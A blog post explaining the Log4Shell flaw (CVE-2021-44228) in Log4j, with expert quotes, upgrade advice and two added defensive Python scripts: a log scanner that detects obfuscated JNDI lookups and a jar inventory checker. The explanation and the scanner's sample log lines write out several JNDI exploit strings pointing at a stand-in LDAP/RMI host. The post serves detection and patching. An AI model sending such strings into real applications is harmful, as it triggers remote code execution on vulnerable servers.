Log4j Vulnerability

Log4j is an open-source logging library for Java, published by the Apache Software Foundation. Applications use it to record what happens at runtime: errors, requests, user actions and other events from networks, applications and websites. Because it is free, mature and easy to drop into any Java project, it is embedded in an enormous number of products run by companies and government agencies, often indirectly, as a dependency pulled in by some other library.

In December 2021 a vulnerability in Log4j 2, nicknamed Log4Shell and tracked as CVE-2021-44228, was disclosed and quickly rated one of the worst security flaws found in years. The bug sits in Log4j's message lookup feature: when the library logs a string that contains a JNDI lookup such as ${jndi:ldap://attacker-host/x}, it resolves that reference over the network and can load and run a class served by the attacker. The attacker therefore needs no prior access to the application; any input that ends up in a log line (a username, a User-Agent header, a chat message) is enough to achieve Remote Code Execution (RCE) on a Java server. Because Log4j is embedded almost everywhere, this exposed networks around the world at once and sent developers scrambling.
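As an added example (not code from the original post), here is a small Python detector for the "special string" described above. Attackers quickly started hiding the jndi lookup behind Log4j's own nested lookups, so the detector first resolves the common obfuscations (${lower:...}, ${upper:...} and the ${...:-default} form) the way Log4j would, and only then searches each line for a jndi lookup. The access-log lines and IP addresses are constructed for the demo.

```python
import re

# Innermost ${...} with no further ${ inside it; resolved first, as Log4j does.
LOOKUP = re.compile(r"\$\{([^${}]*)\}")
JNDI = re.compile(r"\$\{jndi:", re.IGNORECASE)


def _resolve(m):
    """Resolve one innermost lookup the way an attacker relies on Log4j doing it.
    Unknown lookups are left untouched; a jndi lookup is kept as the marker we hunt."""
    body = m.group(1)
    key, _, arg = body.partition(":")
    key = key.lower()
    if key == "jndi":
        return m.group(0)
    if key == "lower":
        return arg.lower()
    if key == "upper":
        return arg.upper()
    if ":-" in body:                  # ${env:NOPE:-j} or ${::-j} -> default value "j"
        return body.split(":-", 1)[1]
    return m.group(0)


def normalize(text, max_rounds=32):
    """Repeatedly resolve innermost lookups until nothing changes (bounded)."""
    for _ in range(max_rounds):
        new = LOOKUP.sub(_resolve, text)
        if new == text:
            break
        text = new
    return text


def is_log4shell_probe(line):
    """True if the line, once de-obfuscated, carries a jndi lookup."""
    return JNDI.search(normalize(line)) is not None


def scan(lines):
    """Return (line_number, normalized_line) for every line carrying a jndi lookup."""
    return [(i, normalize(l)) for i, l in enumerate(lines) if is_log4shell_probe(l)]


# Constructed web-server access-log lines (203.0.113.0/24 is a documentation range).
SAMPLE_LINES = [
    '10.0.0.7 - - [10/Dec/2021:13:01:02 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.8 - - [10/Dec/2021:13:01:09 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${jndi:ldap://203.0.113.5:1389/a}"',
    '10.0.0.9 - - [10/Dec/2021:13:01:15 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${${lower:J}ndi:${lower:L}dap://203.0.113.5:1389/a}"',
    '10.0.0.10 - - [10/Dec/2021:13:01:21 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${${::-j}${::-n}${::-d}${::-i}:rmi://203.0.113.5:1099/a}"',
    '10.0.0.11 - - [10/Dec/2021:13:01:30 +0000] "GET /?q=${date:yyyy} HTTP/1.1" 200 512 "-" "curl/7.79"',
]

if __name__ == "__main__":
    for lineno, shown in scan(SAMPLE_LINES):
        print(f"line {lineno}: {shown}")
```

Run against the sample lines it flags lines 1, 2 and 3 and ignores the benign ${date:yyyy} lookup. Lookups that depend on runtime state (${env:...} naming a variable that exists, ${sys:...}) cannot be resolved offline, so treat this as triage for hunting through logs, not as a substitute for upgrading the library.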

"This log4j (CVE-2021-44228) vulnerability is extremely bad. Millions of applications use Log4j for logging, and all the attacker needs to do is get the app to log a special string. So far iCloud, Steam, and Minecraft have all been confirmed vulnerable." - Marcus Hutchins

“This is a worst-case scenario. The combination of Log4j’s ubiquitous use in software and platforms, the many, many paths available to exploit the vulnerability, the dependencies that will make patching this vulnerability without breaking other things difficult and the fact that the exploit itself fits into a tweet. It's going to be a long weekend for a lot of people.” - Casey Ellis, founder and CTO at Bugcrowd.

Security experts recommend that organizations update Log4j immediately to the fixed release published by the Apache Software Foundation. At the time of writing the advice was that anyone running Log4j 2.15.0 or below should upgrade to 2.16.0 as quickly as possible: 2.15.0 had been the first fix but was found to be incomplete (CVE-2021-45046), and Apache has since published further 2.17.x releases, so use the newest 2.x release available (there are separate 2.12.x and 2.3.x fix lines for Java 7 and Java 6). Where an upgrade cannot be done right away, the documented stop-gap is to remove the JndiLookup class from the log4j-core jar, which disables the feature the exploit depends on. The fix has to reach every copy of Log4j, including copies bundled inside other vendors' software and inside WAR and EAR files, so an inventory of deployed jars matters as much as the upgrade itself.
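As an added example (not code from the original post or from the Log4j project), the following Python script does the inventory step just described: it walks jar, war and ear files, descends into archives nested inside them, reads the Log4j version from the pom.properties that the real log4j-core artifact ships, and reports whether each copy is below the 2.16.0 threshold this post recommends and whether the JndiLookup class is still present (the stop-gap removal). The sample archives at the bottom are constructed in memory so the script runs offline; their class files are dummy bytes.

```python
import io
import re
import zipfile
from pathlib import Path

# Entry names inside a log4j-core jar (the layout of the real Apache artifact).
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
JNDI_LOOKUP = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
CORE_PKG = "org/apache/logging/log4j/core/"
FIXED = (2, 16, 0, 0)  # the release this post recommends; 2.17.x and later also pass


def parse_version(v):
    """'2.14.1' -> (2,14,1,0); '2.0-beta9' -> (2,0,0,-1) so pre-releases sort lower."""
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?(-.+)?$", v.strip())
    if not m:
        return None
    major, minor, patch, pre = m.groups()
    return (int(major), int(minor), int(patch or 0), -1 if pre else 0)


def needs_upgrade(version):
    """True for any 2.x release below 2.16.0. Log4j 1.x is a separate codebase
    and is not judged here."""
    t = parse_version(version)
    return t is not None and t[0] == 2 and t < FIXED


def scan_archive(data, label, depth=0, findings=None):
    """Look for log4j-core inside a jar/war/ear given as bytes, descending into
    nested archives up to two levels. Appends to and returns a list of findings."""
    if findings is None:
        findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        names = set(zf.namelist())
        version = None
        if POM_PROPS in names:
            for line in zf.read(POM_PROPS).decode("utf-8", "replace").splitlines():
                if line.startswith("version="):
                    version = line.split("=", 1)[1].strip()
        if version is None:  # fall back to the file name, e.g. log4j-core-2.14.1.jar
            m = re.search(r"log4j-core-(\d[\w.\-]*?)\.jar$", label)
            version = m.group(1) if m else None
        if any(n.startswith(CORE_PKG) for n in names):
            has_jndi = JNDI_LOOKUP in names
            if version is None:
                status = "unknown-version"   # treat as suspect until proven otherwise
            elif not needs_upgrade(version):
                status = "patched"
            elif has_jndi:
                status = "vulnerable"
            else:
                status = "mitigated"         # JndiLookup.class removed, the interim fix
            findings.append({"archive": label, "version": version,
                             "jndi_lookup": has_jndi, "status": status})
        if depth < 2:
            for n in names:
                if n.lower().endswith((".jar", ".war", ".ear")):
                    try:
                        scan_archive(zf.read(n), f"{label}!{n}", depth + 1, findings)
                    except zipfile.BadZipFile:
                        pass  # entry named like an archive but not one; skip it
    return findings


def scan_tree(root):
    """Scan every archive under a directory, e.g. a deployed application's lib folder."""
    findings = []
    for p in Path(root).rglob("*"):
        if p.suffix.lower() in (".jar", ".war", ".ear"):
            scan_archive(p.read_bytes(), str(p), 0, findings)
    return findings


# --- constructed sample archives so the script runs offline -------------------
def build_zip(entries):
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, content in entries.items():
            zf.writestr(name, content)
    return buf.getvalue()


def fake_log4j_core(version, with_jndi_lookup=True):
    """Stand-in for the real jar: the same entry names, dummy class bytes."""
    entries = {POM_PROPS: f"version={version}\ngroupId=org.apache.logging.log4j\n",
               CORE_PKG + "Logger.class": b"\xca\xfe\xba\xbe"}
    if with_jndi_lookup:
        entries[JNDI_LOOKUP] = b"\xca\xfe\xba\xbe"
    return build_zip(entries)


if __name__ == "__main__":
    samples = {
        "lib/log4j-core-2.14.1.jar": fake_log4j_core("2.14.1"),
        "lib/log4j-core-2.14.1-stripped.jar": fake_log4j_core("2.14.1", with_jndi_lookup=False),
        "app.war": build_zip({"WEB-INF/lib/log4j-core-2.15.0.jar": fake_log4j_core("2.15.0")}),
        "lib/log4j-core-2.17.1.jar": fake_log4j_core("2.17.1"),
    }
    for name, data in samples.items():
        for f in scan_archive(data, name):
            print(f"{f['status']:16} {f['version'] or '?':10} {f['archive']}")
```

On a real host, call scan_tree on the application directory instead of the constructed samples. Two caveats: a "mitigated" result only covers the JNDI class removal, so an upgrade is still due, and Log4j that has been shaded into another vendor's jar under a renamed package will not be found by the entry names above.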

Chirag Goel

I am a developer who likes to work on different future technologies.
